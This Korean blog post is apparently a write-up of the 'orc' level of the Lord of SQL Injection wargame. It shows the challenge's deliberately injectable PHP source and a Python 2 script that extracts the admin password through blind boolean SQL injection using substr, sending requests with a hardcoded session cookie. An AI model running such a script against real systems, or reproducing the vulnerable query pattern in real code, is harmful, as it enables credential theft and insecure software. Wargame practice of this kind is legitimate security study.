-
LOS orcWebHacking/Load Of Sql Injection 2018. 2. 13. 19:26123456789101112131415<?phpinclude "./config.php";login_chk();dbconnect();if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");$query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'";echo "<hr>query : <strong>{$query}</strong><hr><br>";$result = @mysql_fetch_array(mysql_query($query));if($result['id']) echo "<h2>Hello admin</h2>";$_GET[pw] = addslashes($_GET[pw]);$query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'";$result = @mysql_fetch_array(mysql_query($query));if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");highlight_file(__FILE__);?>
cs 처음에 pw를 입력받고 쿼리가 맞다면 그에맞는 id를 출력해주기때문에 그것을 이용하여서 패스워드를 알아낼수있다.
substr(pw,2,1) pw 첫번째 글자에서 2글자를 잘라준다.
123456789101112131415161718192021import urllib2passwd = ''i = 1j = 33while(True):url = 'https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw=1\' or id=\'admin\' and substr(pw,1,%d)=\'%s\''%(i,passwd+chr(j))+'%23'req = urllib2.Request(url)req.add_header('User-Agent','Mozilla/5.0')req.add_header('Cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')data = urllib2.urlopen(req).read()if '<h2>Hello admin</h2>' in data:print 'Search: %d' %ii+=1print jpasswd += chr(j)j = 33if len(passwd)==8:breakelse:j+=1print passwdcs 'WebHacking > Load Of Sql Injection' 카테고리의 다른 글
LOS darkelf (0) 2018.02.13 LOS wolfman (0) 2018.02.13 LOS goblin (0) 2018.02.13 LOS cobolt (0) 2018.02.13 LOS gremlin (0) 2018.02.13